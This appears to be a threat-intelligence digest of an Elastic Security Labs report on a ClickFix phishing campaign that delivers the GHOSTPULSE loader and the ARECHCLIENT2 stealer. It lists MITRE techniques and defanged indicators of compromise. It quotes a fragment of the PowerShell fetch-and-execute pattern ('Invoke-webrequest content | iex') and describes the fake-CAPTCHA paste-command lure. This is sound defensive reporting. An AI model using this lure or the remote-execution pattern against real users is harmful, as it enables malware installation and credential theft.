Threat Research

A Wretch Client: From ClickFix Deception to Information Stealer Deployment – Elastic Security Labs

iocOne
A Wretch Client: From ClickFix Deception to Information Stealer Deployment – Elastic Security Labs

The ClickFix social engineering technique is increasingly used as an initial access vector in multi-stage malware campaigns, delivering loaders like GHOSTPULSE and infostealers such as ARECHCLIENT2. This campaign targets users through deceptive CAPTCHA-like phishing pages, enabling malware execution and extensive credential theft. #ClickFix #GHOSTPULSE #ARECHCLIENT2

Keypoints

  • ClickFix is a prevalent social engineering method tricking users into executing malicious PowerShell commands by mimicking CAPTCHA or system prompts.
  • GHOSTPULSE loader is used as a multi-stage payload loader, delivering encrypted payloads and utilizing DLL sideloading techniques.
  • The campaign deploys ARECHCLIENT2 (SectopRAT), a .NET remote access trojan and infostealer targeting cryptocurrency wallets, passwords, and system data.
  • The initial infection often originates from compromised domains clients.dealeronlinemarketing[.]com and clients.contology[.]com hosted on IP 50.57.243[.]90.
  • ARECHCLIENT2 communicates with hardcoded command and control servers including 144.172.97[.]2 and 143.110.230[.]167 with a complex infrastructure of proxy servers.
  • GHOSTPULSE employs encrypted configuration files and process detection to evade analysis and delay execution in monitored environments.
  • The campaign has been closely monitored by Elastic Security Labs with increasing activity observed throughout 2024 and into 2025.

MITRE Techniques

  • [T1204.002] User Execution: Malicious Link – ClickFix tricks users into copying and pasting malicious PowerShell commands disguised as CAPTCHA verification prompts (‘…users instructed to copy a seemingly harmless “fix”… which is a malicious PowerShell command…’).
  • [T1047] Windows Management Instrumentation – Use of PowerShell commands fetched from remote URLs to download and execute malware components (‘…Invoke-webrequest content | iex…’).
  • [T1129] Shared Modules – GHOSTPULSE loader injects decrypted stage 2 payload into a loaded DLL (vssapi.dll) (‘…injects it into a loaded library using the LibraryLoadA function…’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Execution of encoded PowerShell commands copied by ClickFix technique (‘…copies a base64-encoded PowerShell command to the clipboard…’).
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – Using a legitimate executable to load a malicious DLL for stealthy execution (‘…Crysta_X64.exe loads the malicious DLL DllXDownloadManager.dll…’).
  • [T1083] File and Directory Discovery – ARECHCLIENT2 collects file and system information for reconnaissance (‘…gathers extensive system details, including OS, hardware, IP, machine name, geolocation…’).
  • [T1055.001] Process Injection: Dynamic-Link Library Injection – GHOSTPULSE performs payload injection into memory to evade detection (‘…injects decrypted code into a loaded library…’).
  • [T1140] Deobfuscate/Decode Files or Information – ARECHCLIENT2 decrypts payload sections from memory using a TLS section XOR key (‘…decrypts ARECHCLIENT2 sample using the .tls section…’).
  • [T1027] Obfuscated Files or Information – ARECHCLIENT2 uses heavy obfuscation and encrypted strings to evade detection (‘…heavily obfuscated .NET remote access tool…’).
  • [T1566] Phishing – The campaign uses phishing pages mimicking Cloudflare anti-DDoS CAPTCHA verifications to lure victims (‘…a phishing page that imitates a Cloudflare anti-DDoS Captcha verification…’).

Indicators of Compromise

  • [Domain] Phishing infrastructure – clients.dealeronlinemarketing[.]com, clients.contology[.]com (used to host captcha phishing pages)
  • [IPv4 Address] Malware hosting and C2 servers – 50.57.243[.]90 (phishing page and initial payload), 144.172.97[.]2 and 143.110.230[.]167 (ARECHCLIENT2 command and control servers)
  • [File Hash] GHOSTPULSE components – 2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a (DivXDownloadManager.dll), a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 (Heeschamjiet.rc PNG)
  • [File Hash] Loader and final payload – f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 (DOTNET loader), 4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 (ARECHCLIENT2)
  • [URI] Pastebin URL hosting C2 IP list – https://pastebin[.]com/raw/Wg8DHh2x (used by ARECHCLIENT2 for secondary C2 retrieval)

Read more: https://www.elastic.co/security-labs/a-wretch-client

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint